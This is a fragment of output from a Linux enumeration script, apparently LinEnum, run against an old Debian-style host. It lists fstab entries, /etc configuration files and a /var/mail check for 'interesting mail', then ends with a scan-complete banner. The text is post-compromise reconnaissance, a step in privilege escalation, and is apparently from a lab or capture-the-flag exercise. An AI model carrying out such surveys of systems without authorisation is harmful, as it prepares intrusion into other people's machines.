/dev/mapper/web-swap_1 none            swap    sw              0       0
/dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 310 Oct 14  2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 1195 Jan 12  2011 /etc/rsyslog.conf
-rw-r--r-- 1 root root 599 Mar 12  2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 801 Mar 17  2011 /etc/mke2fs.conf
-rw-r--r-- 1 root root 4728 Mar 31  2011 /etc/hdparm.conf
-rw-r--r-- 1 root root 3343 Apr 11  2011 /etc/gai.conf
-rw-r--r-- 1 root root 350 May  7  2011 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 144 May  7  2011 /etc/kernel-img.conf
-rw-r--r-- 1 root root 321 Mar 21  2011 /etc/blkid.conf
-rw-r--r-- 1 root root 46 May  7  2011 /etc/resolv.conf
-rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 2083 Dec 21  2010 /etc/sysctl.conf
-rw-r--r-- 1 root root 552 Apr 14  2011 /etc/pam.conf
-rw-r--r-- 1 root root 2969 Feb 20  2011 /etc/debconf.conf
-rw-r--r-- 1 root root 2981 May  7  2011 /etc/adduser.conf
-rw-r--r-- 1 root root 600 Mar  9  2011 /etc/deluser.conf
-rw-r--r-- 1 root root 1260 Mar  1  2011 /etc/ucf.conf
-rw-r--r-- 1 root root 475 Oct 21  2010 /etc/nsswitch.conf
-rw-r--r-- 1 root root 6332 May  7  2011 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 882 May  9  2010 /etc/insserv.conf
-rw-r--r-- 1 root root 92 Oct 21  2010 /etc/host.conf
-rw-r--r-- 1 root root 34 May  7  2011 /etc/ld.so.conf
-rw-r----- 1 root fuse 216 Feb 10  2011 /etc/fuse.conf


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 May  7  2011 .
drwxr-xr-x 16 root root 4096 May  7  2011 ..


### SCAN COMPLETE ####################################
